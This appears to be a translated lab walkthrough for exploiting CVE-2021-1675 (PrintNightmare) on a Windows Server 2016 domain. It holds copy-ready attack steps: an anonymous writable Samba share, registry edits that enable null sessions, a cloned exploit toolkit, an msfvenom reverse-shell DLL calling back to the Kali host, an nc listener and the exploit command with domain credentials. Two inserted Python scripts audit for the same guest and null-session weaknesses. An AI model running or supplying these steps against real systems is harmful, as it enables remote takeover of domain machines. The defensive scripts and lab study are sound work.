1. Environment setup
Windows Server 2016 domain environment (Windows Defender turned off)
ip1: 192.168.110.184
ip2: 192.168.13.135
Kali (Samba anonymous share enabled)
ip1: 192.168.110.129
One domain user
2. Set up Samba and enable an anonymous share
Note: Samba cannot be hosted on the public internet; ISPs appear to have blocked port 445 because of EternalBlue.
On Linux (Kali ships with it):
apt-get install samba samba-common
vim /etc/samba/smb.conf
Then change the configuration file to the following:
[global]
map to guest = Bad User
server role = standalone server
usershare allow guests = yes
idmap config * : backend = tdb
smb ports = 445
[smb]
comment = Samba
path = /usr/share2
guest ok = yes
read only = no
browsable = yes
Restart Samba:
service smbd restart
Note: path is the path of the shared folder
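As an added example (not part of the original post), the following Python script audits an smb.conf for shares that can be used without a password and reports whether each one is writable and whether the global "map to guest" setting turns failed logins into guest sessions. It embeds the lab configuration above as a constructed sample; the only parameters it knows are the ones shown there plus Samba's "public" and "writable"/"writeable" synonyms.

```python
"""Audit smb.conf for shares reachable without credentials.

Added example, not part of the original post.  It embeds the lab
configuration from above as a constructed sample and reports every share
that allows guest access, whether it is writable, and whether the global
"map to guest" setting turns failed logins into guest sessions.
"""
import configparser
from typing import Dict, List

# Constructed sample: the lab smb.conf reproduced from the post.
SAMPLE_SMB_CONF = """
[global]
map to guest = Bad User
server role = standalone server
usershare allow guests = yes
idmap config * : backend = tdb
smb ports = 445

[smb]
comment = Samba
path = /usr/share2
guest ok = yes
read only = no
browsable = yes
"""

TRUE_VALUES = {"yes", "true", "1"}


def is_true(value: str) -> bool:
    """Samba boolean parameters accept yes/true/1 (case-insensitive)."""
    return value.strip().lower() in TRUE_VALUES


def parse_smb_conf(text: str) -> configparser.ConfigParser:
    """Parse smb.conf as an INI file.  Samba ignores case and internal
    whitespace in parameter names, so keys are normalised the same way
    ("Guest OK" and "guestok" both become "guestok")."""
    cp = configparser.ConfigParser(delimiters=("=",), interpolation=None, strict=False)
    cp.optionxform = lambda key: "".join(key.lower().split())
    cp.read_string(text)
    return cp


def audit_guest_shares(text: str) -> List[Dict[str, object]]:
    """Return one finding per share that does not require a password."""
    cp = parse_smb_conf(text)
    glob = cp["global"] if cp.has_section("global") else {}
    # "map to guest = Bad User" (or "Bad Password") maps failed logins to the
    # guest account, which is what lets a null session reach a "guest ok" share.
    map_to_guest = glob.get("map to guest", "Never").strip().lower() != "never"

    findings = []
    for name in cp.sections():
        if name == "global":
            continue
        sec = cp[name]
        # "public" is Samba's synonym for "guest ok".
        guest_ok = is_true(sec.get("guest ok", sec.get("public", "no")))
        if not guest_ok:
            continue
        # Shares are read-only unless "read only = no" or "writable = yes".
        writable = (not is_true(sec.get("read only", "yes"))
                    or is_true(sec.get("writable", sec.get("writeable", "no"))))
        findings.append({
            "share": name,
            "path": sec.get("path", ""),
            "writable": writable,       # anonymous clients can drop files here
            "map_to_guest": map_to_guest,
        })
    return findings


if __name__ == "__main__":
    for f in audit_guest_shares(SAMPLE_SMB_CONF):
        print("guest share [%s] path=%s writable=%s map_to_guest=%s"
              % (f["share"], f["path"], f["writable"], f["map_to_guest"]))
```

Run against the lab file it reports the [smb] share as guest-accessible and writable; on a hardened host the expected result is an empty list, and a share that must stay guest-readable should at least come back with writable=False.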
On Windows (I did not get this to work):
mkdir C:\share
icacls C:\share\ /T /grant "ANONYMOUS LOGON":r
icacls C:\share\ /T /grant Everyone:r
New-SmbShare -Path C:\share -Name share -ReadAccess 'ANONYMOUS LOGON','Everyone' (run in PowerShell; not suitable for Win7)
REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionPipes /t REG_MULTI_SZ /d srvsvc /f (this overwrites any existing NullSessionPipes)
REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionShares /t REG_MULTI_SZ /d share /f
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v EveryoneIncludesAnonymous /t REG_DWORD /d 1 /f
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v RestrictAnonymous /t REG_DWORD /d 0 /f
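Added example, not from the original post: a Python check that reads the text format printed by reg query and flags the LanManServer and Lsa values the REG ADD commands above set to their null-session-friendly state. The sample output is constructed here to match those commands, not captured from a real host, and values missing from the output are treated as their Windows defaults.

```python
"""Flag Windows registry values that admit SMB null sessions.

Added example, not part of the original post.  It parses the text that
"reg query" prints and checks the LanManServer and Lsa values set by the
REG ADD commands above.  The sample output below is constructed to match
those commands; it was not captured from a real host.
"""
import re
from typing import Dict, List, Tuple

LSA_KEY = r"HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa"
LANMAN_KEY = r"HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanManServer\Parameters"

# Constructed sample of "reg query" output after the post's REG ADD commands.
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanManServer\Parameters
    NullSessionPipes    REG_MULTI_SZ    srvsvc
    NullSessionShares    REG_MULTI_SZ    share

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa
    EveryoneIncludesAnonymous    REG_DWORD    0x1
    RestrictAnonymous    REG_DWORD    0x0
"""

# Indented value line: "<name>    <REG_TYPE>    <data>"
VALUE_RE = re.compile(r"^\s+(\S+)\s+(REG_[A-Z_]+)\s*(.*)$")


def parse_reg_query(text: str) -> Dict[str, Dict[str, Tuple[str, object]]]:
    """Map key path -> {value name: (type, decoded data)}."""
    keys: Dict[str, Dict[str, Tuple[str, object]]] = {}
    current = None
    for line in text.splitlines():
        if not line.strip():
            continue
        if not line[0].isspace():          # key paths are printed unindented
            current = line.strip()
            keys[current] = {}
            continue
        m = VALUE_RE.match(line)
        if m is None or current is None:
            continue
        name, vtype, data = m.groups()
        if vtype == "REG_DWORD":
            decoded: object = int(data, 16)                 # printed as 0x...
        elif vtype == "REG_MULTI_SZ":
            decoded = [s for s in data.split("\\0") if s]   # \0 separates entries
        else:
            decoded = data
        keys[current][name] = (vtype, decoded)
    return keys


def audit_null_session(text: str) -> List[str]:
    """Return one message per value left in a null-session-friendly state.
    Missing values are treated as their Windows defaults (0 / empty)."""
    keys = parse_reg_query(text)
    lsa = keys.get(LSA_KEY, {})
    lanman = keys.get(LANMAN_KEY, {})
    findings = []
    if lsa.get("RestrictAnonymous", ("REG_DWORD", 0))[1] == 0:
        findings.append("RestrictAnonymous=0: anonymous enumeration of shares is not restricted")
    if lsa.get("EveryoneIncludesAnonymous", ("REG_DWORD", 0))[1] == 1:
        findings.append("EveryoneIncludesAnonymous=1: ACLs granted to Everyone also apply to anonymous logons")
    shares = lanman.get("NullSessionShares", ("REG_MULTI_SZ", []))[1]
    if shares:
        findings.append("NullSessionShares exposes: " + ", ".join(shares))
    pipes = lanman.get("NullSessionPipes", ("REG_MULTI_SZ", []))[1]
    if pipes:
        findings.append("NullSessionPipes exposes: " + ", ".join(pipes))
    return findings


if __name__ == "__main__":
    for msg in audit_null_session(SAMPLE_REG_QUERY):
        print("WEAK:", msg)
```

On the constructed sample all four values are flagged; feeding it the output of reg query for the two keys on a host with RestrictAnonymous=1, EveryoneIncludesAnonymous=0 and empty NullSessionShares/NullSessionPipes returns no findings.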
3. Install the exploit author's impacket fork in Kali
Exploit: https://github.com/cube0x0/CVE-2021-1675
pip3 uninstall impacket
git clone https://github.com/cube0x0/impacket
cd impacket
python3 ./setup.py install
4. Turn off Windows Defender on Windows Server 2016
Link: https://blog.csdn.net/weixin_43140049/article/details/106080625
5. Generate the malicious DLL in Kali and place it in the shared folder
msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=192.168.110.129 LPORT=4444 -f dll -o /usr/share2/shell.dll
6. Start a listener in Kali
Note: do not use the Metasploit handler here; listen with nc (exact reason unknown)
nc -lnvp 4444
7. Run the exploit
python3 CVE-2021-1675.py test.com/testadmin:qazWSX123@192.168.110.184 '\\192.168.110.129\smb\shell.dll'
8. Notes
1) With the anonymous share enabled on Windows using the method above, the exploit failed.
2) Since the VPS cannot open port 445, I forwarded another port on a Linux machine to port 445 on the internal network; the exploit failed in the same way.
3) The exploit fails on Windows Server 2012.